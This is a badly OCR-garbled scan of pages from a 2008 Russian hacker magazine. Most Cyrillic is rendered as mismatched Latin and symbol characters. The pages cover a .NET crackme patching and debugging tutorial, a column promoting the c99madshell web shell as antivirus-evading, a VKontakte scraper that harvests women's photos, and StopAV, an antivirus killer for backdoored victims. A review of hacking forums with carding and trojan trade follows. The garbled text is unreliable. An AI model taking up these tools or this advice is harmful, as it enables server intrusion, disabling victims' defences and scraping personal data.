90Ъ, как на х86). Или же... заменить ЬгЬгие. з ІЬ_0031 на ЬгЕАЬЗЕ. 

3 ІЬ_0031. Тогда любой неправильный пароль будет восприниматься как 
правильный и, соответственно, наоборот. Открыв ЕСМА-335, мы узнаем, 
что инструкция ЪгЪаІзе. з имеет опкод 2СЪ — это все, что нам необходи- 
мо знать для взлома программы. 

Ш ТЕХНИКА ПАТЧА 

Так, где наш НІЕѴѴ? Готов ко взлому? Как нам определить местоположение 
байта, который мы собрались захачить? Ведь виртуальные адреса в кон- 
тексте СЮ- кода неуместны! 

Воспользуемся дедовским способом и поищем последовательность байт 
(сигнатуру), обитающую в окрестностях целевой команды. В нашем случае 
это может быть 2БЪ ОБЪ. 72Ъ 2Е ООЪ ООЪ 70Ъ 28Ъ (об обратном поряд- 
ке байт не забываем, да? Іісіавт автоматически «нормализует» аргументы 
команд, ЮА Рго — нет, показывая ихтакими, какие они есть: наименее 
значимый байт располагается по младшему адресу). Короче, вбиваем 
заданную последовательность в поиск и, убедившись, что это вхождение 
— единственное, переводим НІЕѴѴ в режим записи по <РЗ>. Заменяем 2БЪ 
на 2СЪ, сохраняем изменения в файле по <Р9> и выходим. 



Сеанс работы с отладчиком тсіЬд.ехе«какон есть» 



Запускаем хакнутый файл и... о чудо! Он работает! Теперь любой, 
наугад взятый пароль, например, «123456» воспринимается как 
правильный. Конечно, если программа снабжена цифровым сертифи- 
катом подлинности или использует механизм контроля целостности 
собственного кода, этот номер не пройдет, но ведь взлом надо же с 
чего-то начинать! 

В ТЕХНИКА ОТЛАДКИ 

Спору нет, дизассемблер — весьма популярный инструмент для 
исследования программ. Популярный, но не единственный. Во 
многих случаях отладчик оказывается намного более предпочти- 



Основные 
команды отладчика 
тсПэ^.ехе 

Ъеір: вывод встроенной справки, «Ьеір команда» — подробная 
справка по команде; 

а[ИасЬ] : подключение к активному .МЕТ-процессу; 

Ь [геак] : установка точки останова или отображение уже сущес- 
твующих; 

са[(с1і] : просмотр событий (еѵепй), вызывающих останов 
отладчика; 

сопГ[і§] : просмотр опций отладки/конфигурирования отладчи- 
ка; 

сіеі [еіе] : удаление точки останова; 

с!е[1:асЬ] : отключение от отлаживаемого .КЕТ-процесса; 

§[о] : продолжение работы программы; 
п[ехГ] : ЗГер Оѵег; 
о[Ш:]: ЗіерзОЩ; 

8 [(ер]: Згер Іпго; 

р [гіпі:] : вывод содержимого локальных переменных; 

ЯЕиіІ] : выход из программы; 

г[ип] : запуск программы под отладчиком; 

5е(: изменение значение переменных; 

зегір: установка текущей выполняемой команды; 

$Ь[о\ѵ] : показ окрестностей выполняемого кода. 
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Единственная (на сегодня) реализация платформы .ЫЕТ вне МісгозоЙ 



мп двоичной .ІЧЕТ-сборки в ассемблерный 
айл штатным дизассемблером іісіазт. ехе 



тельным. Вместо того чтобы гадать, какое значение имеет пере- 
менная в даннойточке (в дизассемблере), гораздо практичнее 
заглянуть в нее отладчиком. 

И воттут выясняется любопытная вещь. На уровне исходных текстов 
МісгозоЙѴізиаІЭіисІіо справляется с отладкой на ура, но готовые бинарные 
сборки, увы, не поддерживает. Для работы с ними необходимо использо- 
вать ІСогОеЬид-интерфейс, встроенный в ядро платформы .ЫЕТ и реа- 
лизующий базовые отладочные возможности (установка точек останова, 
пошаговое исполнение ит.д.), предоставляя их в виде набора АРІ-функций. 
Все .ЫЕТ- отладчики, которые я видел, являются достаточно тонкими 
обертками вокруг ІСогОеЬид ІпіеНасе и наследуют его худшие черты, а 
именно — невозможность отлаживать программы без символьной (отла- 
дочной) информации, автоматически удаляемой из всех Реіеазе-проектов. 
Выходит, что мы можем отлаживать только свои собственные программы?! 
Нехорошо! 



Терминологи- 
ческое болото 



Расследование показало, что штатному .ЫЕТ отладчику (зовущемуся тдЪд. 
ехе, где «т» — сокращение от тападесі, то есть управляемый код) для 
нормальной работы вполне достаточно рбЬ-файла. Воттолько какэтотфайл 
получить? ЮА Рго может подготовить тар-файл, но готовых конверторов 
тар2рсІЬ в Сети что-то не наблюдается, а писать самому — лениво и непро- 
дуктивно. 

К счастью, существует весьма простой и элегантный путь. Дизассембли- 
руем бинарную сборку штатной утилитой і 1с іазт. ехе, после чего ассемб- 
лируем ее заново штатным же транслятором ііазт. ехе, не забыв указать 
«волшебный» ключик /рсЗЬдля генерации отладочной информации. 
Поскольку іісіазт. ехе поддерживает ресурсы и корректно их дампит.то 
предложенный способ работает в подавляющем большинстве случаев, что 
мы сейчас и продемонстрируем. 

Запускаем іісіазт. ехе с настройками по умолчанию, загружаем в него 
п2к_сгаскте_011і. ехе (оригинальный, а не хакнутый). В меню Рііе 
находим пун кт Ршлр (или нажимаем < СТР Б- Б>),впоя вившемся окне 
«Ритр орііопз» (смотри рисунок) оставляем все галочки в состоя- 
нии по умолчанию. Главное, чтобы была взведена галочка «Ритр ІЬ 
Сос1е»\ После нажимаем «ОК» и вводим имя файла для дампа (напри- 
мер, «сгаскесі»). 

По окончании дизассемблирования на диске образуются два файла 
— сгаскесі. іі с ассемблерным текстом программы и сгаскесі. гез с 
ресурсами. Сгаскесі. іі представляет собой обыкновенный текстовой 
файл, который можно править в любом текстовом редакторе, при необхо- 
димости заменяя «Ъгѣгие. з ІЬ_0 031» на «ЬгРаІзе . з ІЬ_0031». Но 
сейчас нас в первую очередь интересует не патч, а отладка. 

Берем штатный ассемблер и собираем файл следующим образом: 



^ЕТ: древняя, как мир, идея двухстадийной компиляции; снача- 
ла программа (написанная хоть на Іаѵа, хоть на Ѵізиаі Вазіс, хоть 
на Си + + , хоть на С#, хоть на Р #) транслируется в промежуточ- 
ный байт- код, который окончательно транслируется в «родной» 
двоичный код на конкретной целевой машине или же исполняет- 
ся в режиме интерпретации; 

СІЛ: СоптюпЬап^иа^еКипгіте («общая среда выполнения язы- 
ков») — компонент МІСЮ 50 Й: .ЫЕТ Ргате\ѵогк, включающий себя 
виртуальную машину и необходимые библиотеки; 

СІЬ: Согппюп Ьап§иа§е ІпітазСшсШге — «спецификация общеязы- 
ковой инфраструктуры», определяющая архитектуру испол- 
нительной системы, базовые классы, синтаксис и мнемонику 
байт-кода; 

М8ІЬ: Місгозой: ІШегтебіаГе Ьап§иа§е («промежуточный язык от 
Місгозоіі») — байт-код виртуальной .ЫЕТ машины в реализации 
от Місгозоіт; 

ІЬ: ІпГегтесііаГе Ьап§иа§е («промежуточный язык») — байт-код 
виртуальной .ЫЕТ машины, стандартизованный в рамках ЕСМА- 
335. 



$і1азш.ехе сгаскесі. іі /рсіЪ 

На диске образуются файлы сгаскесі. ехе и сгаскесі. р<1Ъ, готовые 
кзагрузке в отладчик. Что примечательно — отладочная информация 
непосредственно в сам исполняемый файл не записывается. Это 
очень хорошо, иначе нам пришлось бы потом оттирать ее оттуда или 
мириться с увеличением размера поломанного ехе, что вряд ли входит 
в наши планы. 

ОК, набираем в командной строке «$т6Ьд. ехе сгаскесі. ехе» и... 
оказываемся в консольном окне отладчика, автоматически останав- 
ливающегося на первой команде функции Мэіп (передает нам бразды 
правления). А что такого крутого и хорошего мы можем сделать? 

Начнем с просмотра окрестной, за что отвечает команда «збоѵѵ» или ее 
более короткий алиас «зЬ». Результат выглядит так: 

Результат работы команды «зН», показывающей ІІ_-код 

гип сгаскесі. ехе 

# запущена бинарная сборка сгаскесі. ехе 
ЗТОР: Вгеакроіпб Ніб 
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Внешний вид .МЕТ-сборки, полученной путем трансляции Си++ программы 



# точка останова в функции шаіп 
43: ІЬ_0000: пор # следующая выполняемая команда 

[р#:0, к#:0] тсІЪд> зЬ. 

# просим отладчик показать окрестности кода по "зіі" 



40 


.гпахзЬаск 2 




41 


. Іосаіз іпід 


(зДгіпд Ѵ_0 , Ъооі Ѵ_1) 


43 :* 


ІЬ_0000 : пор 






# команда выполняемая следующей 


44 


ІЬ_0001 : ІсІзДг "епДег раззѵгогсі: " 


45 


ІЬ_0006 : саіі 


[шзсогііЬ] З узбеш. 



Сопзоіе: :№гіРе ( збгіпд ) 

[р#:0, Д#:0] тсІЬд> 

Остальные команды отладчика можно найти во встроенной справке 
(вызываемой командой Ьеір) илиже в одноименной врезке. Сейчас нас 
интересуеттехника работы с отладчиком. Ну, техника, кактехника. Никаких 
принципиальных отличий отх86 не появилось. 

При просмотре ассемблерного файла сгаскеб. іі находим команду 
«ІЬ_0020 : зЫос. 1», которая стягивает со стека результат сравнения 
двух строк, возвращенный функцией Зузѣет. Зігіпд : : ор_Едиа1іі:у. 
За ней следует команда «ІЬ_0021 : Ібіос. 1», загружающая получен- 
ное значение в локальную переменную Ѵ_1, в зависимости отсодер- 



жимого которой команда «ІЬ_0022 : Ъгкгие . з ІЬ_0031» прыгает 
на метку ІЬ_0031 (неверный пароль). Или... не прыгает. Все ясно! Нам 
нужно установить точку останова на команде «ІЬ_ 0020 : зЫос . 1», 
расположенной в 55’ой строке файла сгаскеб. іі, а дальше мы уже 
сориентируется. Весь сеанс работы с отладчиком тбЬд. ехе ищи на 0Ѵ0 
в полномасштабной статье. Если кому-то родители запрещают использо- 
вать консоль, что ж, к его услугам Ооіпеі ІІ_ Есіііог— бесплатный ІІ_-отлад- 
чик с 6 III -интерфейсом, однако тбЬд.ехе мне как-то больше по душе (к 
тому же под него расширения всякие можно писать). 

Впрочем, выбор отладчика непринципиален. Важна саматехника иссле- 
дования .ЫЕТ-программ, которую мы только что и продемонстрировали. 

^ ЗАКЛЮЧЕНИЕ 

Разумеется, в рамках одной-единственной статьи невозможно охватить 
все аспекты взлома .ЫЕТ-программ. В частности, совершенно нетронутой 
осталасьтема упаковщиков бинарных сборок и протекторов, распаковы- 
вать которые приходится руками. Это тема для отдельного разговора. 

А пока имеетсмысл потренироваться на простых, несильно защищенных 
коммерческих программах (которые можно найти в Сети), малвари (взятой 
оттуда же) и сгаскте, залежи которых находятся на сайте ѵѵѵѵѵѵ.сгасктез.сіе 
(где даже есть специальный раздел, посвященный исключительно плат- 
форме .ЫЕТ). 

Я надеюсь, что эта статья обеспечит хороший старт, а остальное — дело 
времени, техники и бесчисленных экспериментов! ЗЕ 
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Программы для хакеров 



ПРОГРАММА: С99МАР8НЕИ 
ОС:УІІЧ/*МІХ 
АВТОР: МАС'МЕТ 







Доработанный с99зЬеІІ 



Помнится, нетакдавно выкладывал я подборку 
самых разных веб-шеллов. Были там и рбр, и регі, 
и азр-скрипты. Но время идет, а хакерская мысль 
не стоит на месте. Хочу представить твоему вни- 
манию достойную переделку популярного веб- 
шелла «с99зЬеІІ» под названием «с99тасІ5ЬеІ.І». 
Веб-шелл написан на основе с99збеІІ и перенял 
все его положительные стороны, такие как: 



• Удобный обозреватель и редактор 
файлов на сервере 

• Функциональный 5()Б- клиент 

• Командная строка 

• Выполнение произвольного РНР-кода 

• Поиск файлов . Ьбраззжі, сопбід. 
іпс.рЪр, зиіб, здіб, зегѵісе .рѵ?с1, 
МпсЦЬазЬ, .бебсЬшаіІ, ебс 

• Работа с буфером 

• Менеджер процессов 

• Базовая оценка безопасности сер- 
вера 

• Работа при включенном ЗабеМосІе- 
режиме 

• Совместимость со всеми операцион- 
ными системами 

• Защита путем авторизации (логин/ 
пароль) 



Из основных нововведений, приобретенных 
скриптом, отметим: 



• Упрощенное отображение (никакой 
лишней графики, только текст и псев- 



дографика) 

• Невидимость для антивирусов 
(скрипт полностью переписан, тело 
закодировано ) 

• Уменьшенный размер (удалено все 
лишнее, размер составляет 44 Кб) 

• Отсутствие СЕТ-запросов (все за- 
просы передаются РОЗТ-методом) 

• Пофиксены мелкие недочеты 



Новый вариант веб-шелла пропалить гораздо 
сложнее, чем предыдущий (конечно, еслиты не 
будешь заливать в корень веб-диры скрипте 
названием зЬеІІ.рЬр :)). Крометого, с99тасІ5беи 
обладает приятным и удобным интерфейсом, что 
является несомненным плюсом в повседневной 
рутине. В общем, какой из веб-шеллов юзать 
— решать тебе, я лишь немного расширил выбор. 

ПРОГРАММА: ѴКОИТАКТЕ ЗЕАКСН 
ОС:УІМ/*ІЧІХ 
АВТОР: -Н0РМ060- 




Ищем девушек «Вконтакте» :) 



«Вконтакте» по-прежнему привлекает все новых 
и новых пользователей. Возможно, именно 
поэтому ресурс постепенно становится одной 
из основных мишеней для спамеров и хакеров 
рунета. Надо отдать должное админам портала 
— все немногочисленные баги они прикрывают 
достаточно быстро, но, тем не менее, у меня есть, 
чем тебя порадовать. Нет, я не буду предла- 
гать заюзать очередную спамилку или брутер 
аккакунтов. Вместо этого представляю тебе тулзу 
«Ѵкопіакіе БеагсЬ». Утила написана на РНР и 
предназначена для поиска нужных людей на 
просторах ресурса (например, симпатичных де- 
вушек :)). Да-да, самые догадливые уже поняли, 



что скрипт осуществляет поиск по заданным 
критериям и сохраняет фотки юзеров. Все, что 
оттебя требуется — указать в сорце значения 
нескольких переменных: 



$ іб= " " ; II — твой ІБ 

$етаі1=" " ; II — твой мыльник 
$раззѵгогб=тсі5 ("");// — твой пароль 
$зех="1"; //—пол, 1 — женский, 

2 — мужской (не знаю, как для тебя, а 
мне девушки все-таки предпочтитель- 
нее : ) ) 

$сібу="1"; // — ІБ города 



Ниже перечислено несколько примеров Ю для 
городов: 



49 — Екатеринбург, 60 — Казань 
61 — Калининград, 72 — Краснодар, 

73 — Красноярск, 1 — Москва, 

87 — Мурманск, 95 — Нижний Новгород, 
99 — Новосибирск, 104 — Омск, 

110 — Пермь, 119 — Ростов-на-Дону, 
123 — Самара, 2 — Санкт-Петербург 



Думаю, с запуском скрипта проблем не возникнет, 
а вотс парсингом результатов поиска дело обстоит 
сложнее. Посему предлагаю заюзать отдельный 
скрипт для обработки лога: 



<? 

еггог_герогбіпд (Е_АББ) ; 

$іі1е=бі1е ( " Іод. бхб " ) ; 

бог($і=0; $і < соипб ( $1і1е) ; $і++) { 

Іізб ( $іб, $ішд, $піск, $гер) =ехр1ос1е ( 

И :",$бі1е[$і]); 

есЬо " Іб: $ісІ ( $піск) <ВК><ІМС 

5КС= ' ішд/ " . $і<3. . $ішд . " ° ><ВК>" ; 

есЬо $1і1е [$і] ; 

} 

есЬо соипб ($1і1е) ; 

?> 



После парсинга лога ты без проблем сможешь 
в удобочитаемом виде узнать, сколько людей и 
кого именно нашел скрипт, ну и, естественно, 
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просмотреть фотки. Другими словами, если тебе 
есть, кого искать или ты собираешься замутить 
очередную пати, пригласив с десятоксимпа- 
тичных девчонок, — этатулза явно длятебя. 
Кстати, скрипт несложно переписать под работу с 
несколькими аккаунтами, так что дерзай. 

ПРОГРАММА: 5Т0РАѴ 
0С:У№0ѴЗХР 
АВТОР: С'Р.ЗАМІЖ 




зш]“ ж 

3 |“ 

3 “ 



Убиваем антивири наповал 

Описывая различные бэкдоры или, как их 
еще принято называть — «системы удален- 
ного администрирования» (несанкциони- 
рованного...), невольно задумываешься об 
установленном на машинежертвы антивиру- 
се. Убить антивирь ручками далеко не всегда 
является возможным, однако, товарищ 
Ог.ЗатиіІ позаботился об этой проблеме, 
накодив такую полезную утилу, как ЗіорАѴ. 
Тулза написана на ОеІрГіі и представляет 
собой убийцу анти в и рей. На данный момент 
утила убивает: 



• МсАббее АпбіѴігиз 7.1 Епбегргізе 

• Антивирус Касперского б . О 

• Антивирусная утилита АѴ2 4.29 

• Утилита для обнаружения сканиро- 
вания портов 1.90 

• Казрегзку Іпбегпеб ЗесигіСу 7 . 0 

• Рапба Апбіѵігиз 2008 (3.00.00) 

• МпАпбіѴігиз Рг о 2007 

• Тгепб Місго ОІбісеЗсап 7 . 0 

• ЫОБ32 АпбіѴігиз 2.7 



Не хочется говорить лишних слов по поводу 
правомерности использования тулзы и 
прочего, поэтому я процитирую обращение 
автора, из которого тебе все станет ясно: 



«Программа не должна использо- 
ваться в противоречии с законами 
РФ. Она не должна быть направлена 
на нарушение авторских прав и/или 
предоставление несанкционирован- 
ного доступа к защищенной информа- 
ции. Автор программы не несет от- 
ветственности за любой вред, ущерб 
или действия его программного про- 
дукта, которые могут возникнуть в 
ходе работы, будь оно злоумышлен- 
ным или «просто в шутку» 



Какты понимаешь, сферы применения утилы 
могут быть совершенно разными. Посему мне 
остается лишь выложить тулзу на наш йѴй и 
уповать на твою совесть. 
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ПРОГРАММА: АМН КЕѴЮССЕР ЗНІЕІ.С' 
ОС: ѴІМС'ОѴЗ 2000/ХР 
АВТОР: АМІСТОСИЗ 




Юзаем антикейлоггер 



Если предыдущая угила поможеттебе избавиться 
отантивирей (причем, не обязательно у себя на 
компе :)), то кто расправится с кейлоггерами натвоей 
машине? Не секрет, что большинство троев включают 
поддержкулогирования набранного с клавытекста, 
что делает их с одной стороны еще опаснее, а с другой 
—уязвимее. Все просто —тулза Апб КеуІоддегЗЬіеІсІ 
способна оградить тебя от практически любого 
кейлоггера, а значит, оттроя, с работающей функцией 
кейлога. В отличие от многих похожих продуктов, Апб 
КеуІоддегЗЬіеІсІ суспехом обходится без какой-либо 
базы данных. Утилита блокирует механизмы, по 
которым работают известные или неизвестные кей- 
логгеры, после чего они перестают функционировать. 
Из особенностей утилы можно выделить: 



• Бесплатность 

• Работа в трее 

• Обнаружение неизвестных кейлог- 
геров 



После запуска тулзы ты не почувствуешь ка- 
ких-либо изменений, кроме своего душевного 
спокойствия :). 



ПРОГРАММА: М0ЕІ5ЕР0В0Т 
ОС: ѴІИ00ѴЗ 2000/ХР 
АВТОР: АЕІТОМАТІОМВОХ 

Наверняка, в глубине души ты не раз мечтал 
об ИИ (искуственном интелекте) втелетвоего 
питомца (компа/ноута). Спешутебя обрадовать, 
сутилой МоизеРоЬоГты станешь на шагближе 
к заветной мечте. Конечно, тулза не заменит 
человека, но обучаться новым заданиям ей 
вполне под силу. Суть утилы заключается в 
автоматизации действий в Винде — софтинка 
способна запоминать и повторять необходимую 
работу. Основные преимущества МоизеРоЬоГ в 
сравнении с аналогичными программами: 



• Простой и удобный гуишный интер- 
фейс 

• В отличие от большинства программ 
МоизеКоЬоб не запоминает перемещения 
мыши. Вместо этого выполняется анализ 
интерфейса автоматизируемой про- 
граммы, после чего создается своего 
рода «карта», помогающая в дальнейшем 
находить нужные элементы интерфейса, 
даже если изменится их местоположе- 
ние , размеры или внешний вид 

• Записанная последовательность 
действий выполняется с максимальной 
скоростью, которую способна обеспе- 
чить автоматизируемая программа 




• Записываемая последовательность 
действий разбивается на отдельные шаги 
(«нажать на кнопку», «ввести текст») , 
которые впоследствии могут быть с лег- 
костью настроены или изменены. 



Область применения тулзы напрямую зависит 
оттвоей фантазии. В качестве примера можно 
привести: 



• Запись СБ или ПѴБ диска: запустить 
программу записи, выбрать файлы из 
заданного каталога, дождаться окон- 
чания записи и извлечь диск 

• Отсканировать , распознать и сохра- 
нить документ в файл, даже если каж- 
дый шаг будет выполняться отдельной 
программой 

• Автоматически установить и настро- 
ить проги на нескольких компьютерах 

• Применить серию фильтров и эффек- 
тов в программе обработки изображе- 
ний 



Кто з н а ет, б ыть м ожет, тынаучишь утилу парсингубагов 
через Гугл или автоматизированному поиску инъектов 
— все втвоих руках. Огорчает одно: триальная версия 
проги работает всего 30 дней. Хотя, для подобнойути- 
лы потратить пару баксов из своего кармана нежалко 
:). Взять про грам мѵ можно по адресѵ аиІотабопЬох. 
сот/ги/бомпІоабз.ЬітІ .либо на нашем ОѴй. 



ПРОГРАММА: А N Т О М АТ I О N В О X Т001.3 
ОС: ѴІІЧ&0Ѵ5 2000/ХР 
АВТОР: А У Т О М АТ I О N В О X 




Автоматическая записьболванки 

Еще одна утила для автоматизации выполняемых 
на компедеяний — АиГотабопВохТооІз. Точнее 
сказать, наборутил, включающий: 



• аЬбрІау — эмуляция ввода с клавиа- 
туры и мыши 

• аЬДсарбиге — получение информации 
об объектах (элементах интерфейса) 

• аЬбсопбгоІ — поиск объектов на эк- 
ране и управление ими 

— аЪДзсгзПоб — создание скриншотов 
экрана , окон и отдельных объектов 



Одно из основных отличий от МоизеРоЬоІ — функ- 
ционирование в командной строке и фриварность. 
Да, да, утила полностью бесплатная, что не может 
не радовать. Кстати, софтину удобно юзать для 
сбора информации с веба. Расписывать весь алго- 
ритм действий я не буду, тем более, утила снабжена 
подробной справкой. Могулишь посоветовать 
взять АіЛотабопВохТооІз на вооружение, ц-ц 
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ЗАМЕТОуИИ 

О ХАК-ФОРУМАХ 




ѵЮНМІЧѴ ІЫ8ЮЕН 

/ МАСД2ІЫЕ@НЕАЬ. ХАКЕР. ВЦ / 



Предвзятый обзор неприватных 


хакерских 


и околохакерских конференций 





Самый лучший источник информации в хакерской среде — это специализиро- 
ванные форумы. Развелось их нынче немало и в них стало легко запутаться. 
Чтобы этого не случилось и чтобы тебе не пришлось бродить по пустым или 
ламерским сайтам, мы попросили Джонни написать коротенький отчетик о те- 
кущем положении дел на хакфорумном поприще. 



Тогит.хакер. ги 



• Напрямую можно (попробовать) пообщаться с редакцией. Из команды тут 
обитают: пікііоі, зіер, ЬгЬ, догі, сШпу, и наверняка, кто-то еще, кто просто не 
палится. Основной канал для общения сжурналом. 

• Форум существуетуже почти 8 лет, сообщений дофига и на любые темы, но 
что-то серьезное и приватное я находил очень редко. 

• Бизнес есть, что-то продается, заказываются взломы, бывают кидки. Есть 
проплаченная реклама. Интересно, комуони платят? 

• Много хорошо прокачанных веток, нет откровенного слива. Все, от дизай- 
на и кончая взломом и западлом. 

• Культ Пупкина-Зейда. Целая тусовка, регулярно приезжающая на все 
акции журнала. Многих редакция помнитв лицо. 

• Для облегчения работы управления «К» на сайте есть «Геотаргетинг», 
с помощью которого все пользователи могут привязать свой профиль к 
точке на карте и даже при необходимости познакомиться с тем, кто живет в 
округе. 

• Форум вместе с сайтом раз в год ломают. 




Иазт. ги/Тогшп 



• Специализированный форум. Тусуется куча профессионалов. Новичокс 
васма на іпаНаск покажется гуру... потому что направления у них разные, 
конечно ;). 

• В каждом треде можно вычитать что-то интересное о низкоуровневом 
программировании. 

• С вопросами по вирусам, упаковщикам, крипторам и вообще по хеккерно- 
му программированию — только на Васм. 

• У модеров сквозит нелюбовь к концепции нашего журнала, однако много 
юзеров ][ читают, и это заметно по постам. 

• ѴѴазт — это колыбель вирусмейкера. Большинство авторов руткитов и 
троянов начинали именно отсюда. 

•Тутестьдаже Крис Касперски. Атакже куча разработчиков антивирусов, 
драйверов и прочих сложных, но прикольных штук. 

• Коммерческий раздел — лучшее место для того, чтобы найти кодера под 
какую- ни будь хакере кую за да чу. За написание банковского троя тут да ют 
до 15к. 

• А еще тут все ищутЗомбу (легендарного и бессмертного гуру-вирусмейке- 
ра іОтЬіе). Интересно, зачем? 




► 076 



ХАКЕР 05 /113/ 08 














сцена 



ІЪгит.апІісЬаСги 

ІЪгит.ѵѵеЬ-Ьаск.ги 

ІЪгит.хакер.ги 

ІЪгит.гІоу.огд 

ІЪгит.азесЬка.ги 

хакеру.ги 

сагсііпдѵѵогісі.сс 

сгаскІаЬ.ги 

ѵѵазт.гиЯогит 

сІатадеІаЬ.огд 

ІЪгит.іпаДаск.ги 

ехріоіі.іп 

ѵегіЯесІ.ги 

ІЪгит.тагаІ'ака.ги 

сагсіег.іп^о 

Ііаскгопа.ги 

зесигііу-іеатз.пеі 

Иаскеѵегусіау.сот 

гепд.ги 

кіЬег-гопа.огд 

сІксз.дѵѵНозТпеІ 

гооікііз.ги 




О 100000 200000 300000 400000 500000 



Количество сообщений и зарегистрированных пользователей на форумах (апрель 2008) 




тогиш.апіісііаі. ги 



• Очень объемный иживой форум. Много умныхлюдей, многолохов, много флейма, много всего 
полезного. В принципе, достаточно высокий средний уровень подготовки. 

• На форуме постится много интересных и эксклюзивных статей и сорцов (разделы «Избранное» 
и «Статьи»). 

• Активный бизнес-раздел: ѵрп, шеллы, соксы, взломы, Йр, загрузки ит.п. Трояны запрещены. А 
жаль. 

• Несколько постоянных авторов взлома пришли в журнал как раз сантичата. За что мы его и 
любим, а он нас — нет. 

• Радует, что нет всяких оффтпиковых разделов типа «Дизайн». 

• Все-таки это самый крутой форум по хаку. На том же веб-хаке всего по безопасности тысяч 100 
сообщений, а на античате более полумиллиона и почти без оффтопика. 




Тогит.меЬ-Ііаск. ги 




• Мной этотфорум почему-то воспринимается как неприватная альтернатива закрытой отлишних 
глаз мазе. Хотя, думаю, зря воспринимается. 

• Большой и оченьактивный бизнес-раздел, много сервисов и предложений. Мелькаютники, 
знакомые по приватным форумам. Доступ туда только зареганным, однако зарегаться может 
любой. 

• Много оффтопиковых и совершенно неинтересных мне разделовтипа «Игры, музыка, фильмы», 
«В помощь ВебМастеру» ит.п. Собственно «потеме» раздела всего 4 из 20, но наиболее активные 
все равно — по информационной безопасности и хакерству. 

• Дохрена баннеров: антиабузные хостинги, загрузки троянов, фарма-партнерки, соксы ит.п. 

• Сточки зрения «науки» форум интереса не представляема вот начать зарабатывать тут можно. 
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Тогит.іпаІіГаск. ги 



• Если на гооікііз трояны пишут, на ѵѵавт частенько заказывают, на веб- 
хаке, бывает, продают, то на іпаііаск ищутхалявные и вовсю пробуют«на 
соседях». Причем чаще всего используется РіпсЬ. 

• Узнал много нового о легком и быстром хаке. Например, неприятелю не 
обязательно отправлять троя, можно отправить ссылку на фейк. Говорят, 
работает;). 

• Очень много новичков. И их здесь не обижают. Спросишь, какузнать ІР 
ламера в чате — дадут 1 0 рабочих способов — выбирай любой. 

• Над некоторыми тредами угорали всей нашей инсайдерской группой. 

• Никакого бизнеса тут нет. 

• Повеселил тот факт, что некоторые пользователи форума ухитряются до 
сих пор воровать интернет. Я-то думал, что мода на чужие пароли к прову 
прошла году этак в 2000. Рисковать своей шеей ради анлима, которого 
можно купить за 150 рублей — это очень странная тема. 




хакер 



ХДКЕРѴ.ЯО 



• Неплохой форум, ему уже лет пять, однако я о нем почему-то очень редко 
слышу. 

• Хоть тут и много всякихтрешовых разделов, основное направление 
форума все равно — хак. 

• Имеется уже два выпуска собственного хакерского езина «хакеру.ш 
еі!пЗ». Ценности он большой не представляет, но взглянуть можно. Осо- 
бенно, если интересуют маны поустановке еггдропа или орепѵрп ;). 

• Еще во времена повального распространения платных билдов пинча 
была на этом форуме прикрепленная веточка в разделе «Социальная 
инженерия &Трояны», гдетоли Дамрай.толи еще кто-то все время инте- 
ресовался, чего бы добавить. Тогда было очень интересно. 

• Есть активный бизнес-раздел (второй по объему на форуме), Ыаск- и 
ѵѵЫіе-листы и реклама по $30 в месяцза приклепленныйтопик. 

• Как и у других форумов, на ѵВиІІебп есть В55, что не может не радовать. 

• Присутствует также кардинговая ѴІР-зона с входом по заявкам. В ней уже 
4.5ксообщений. 





• Я бы, наверно, вообще не стал бы говорить об этом пусть и объемном, но 
совершенно бесполезном для меня форуме, если бы не «Смерть барыгам». 
Это 23-страничный тред, в котором люди выкладывают«паблик и полупаб- 
ликматериалы, замеченные в обороте у спекулянтов». Эксклюзив. 

• Искал я траск свеженький, везде он штуку баксов стоит, а здесь бери да 
качай. 

• Также я нашел в «Смерти барыгам»: крипторы, полуприватныетрои с 
админками, каких-то ддос-ботов, не очень свежие сплоиты, чекеры и даже 
пинчевые логи. В процессе разбора халявы подцепил трояна вживом 
виде. Хорошо хоть под ѴМѵѵаге был. 

• На форуме проводятся конкурсы с призами, но с хреновыми и редко. 

• В разделе «Материалы по взлому» публикуются вполне читабельные 
статьи, но редко и маленькие. С античатом несравнимо. 
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гоо-Ькі 1: 5 . ги 



• Хороший форум для разработчиков всякой малвари, руткитов и прочего 
зверья. 

• Бываеттакое, что кто-нибудь из присутствующих нечаяно спалит какой- 
нибудь (полу)приват. Мелочь, а приятно. 

• Форум небольшой, модераторы адекватные и хорошо разбирающиеся в 
теме, но некоторые пользователи производят впечатление полных отмо- 
розков. Что-то вроде «научился писать руткиты и теперь я бог». В общем, 
безпочвенный снобизм, бывает, наблюдается. 

• Немало инфы по кегпеі-кодингу в специальном разделе. Раньше, какя 
понимаю мест где можно было поговорить на этутемутолком то и не было. 
Сейчас есть отдельный раздел на ѵѵазт, нечто по низкоуровевому кодингу 
на гзсіп и вполне активный форум на гооікііз.ги. 

• Мое ощущение, что если вирмейкерская сцена где-то и есть, то только на 
васме и тут. Ну, если не вирмекерская, то просто малварная. 




сгаскІаЬ. ги 



•Лучший известный мнефорум, посвященный взлому программ, реверсингу ит.п. Это действи- 
тельно полезное место. 

• Местный контингент — это в основном гики, получающие истинное удовольствие от обсуждения 
новой версии какого-нибудь РЕ-редактора или дампера. 

• Где, какнездесь, помогут снять защиту или разобраться стриалом. 

• На сгаскіаб’е вполне адекватная структура форума, немного разделов и все очень прокаченные: 

• Креки, обсуждения; 

• Софт, варез; 

• Вопросы новичков; 

• Программирование. 

• Это место на равне с васмом должно быть в букмарках хакера. 30 . 






ПРЕДЛАГАЕМ 



Узнаваемое Имя Домен 



Твердое Положение Хостинг 



Широкие внутренние ресурсы Виртуальный сервер 



Компания БгсгХ'Эсткнг 



т, [495] ТВ4*-** 



Ш . ОСНОВА УСПЕШНОГО ПРЕДПРИЯТИЯ 









Х-РгоШе 



МАРИЯ «МІРРІЫ.» НЕФЕДОВА 

/ МІГШШёЖЮОІСК.Ки / 



Жанна 

Рутковская 

Героиня нашего сегодняшнего профайла - Жанна Рутковская (.Іоаппа 
КиГкомзка) - не любит, когда ее называют хакером. Она предпочита- 
ет более корректный и обтекаемый термин: исследователь в области 
информационной безопасности. Но кем, если не хакером, считать че- 
ловека, взломавшего Висту, на весь мир посрамившего безопасность 
поделки МісгобоТІ: и создавшего нашумевший руткит Віие Р і 1 1 ? 



Жанна Рутковская 

ВОЗРАСТ: 27 лет 



ЗАСЛУГИ: Множественные выпады в сторону системы безопасности Міпсіоиз 
ѴІ5ТА: создание руткита Віие Рі 11 ; единственная женщина, в 2006 году 
вошедшая в ТОП-5 хакеров мира 



Н О ЖАННЕ 

Рутковская не только молодая симпатичная девушка, но и наша гео- 
графическая соседка. Она родилась и живет в Польше. Жанна окон- 
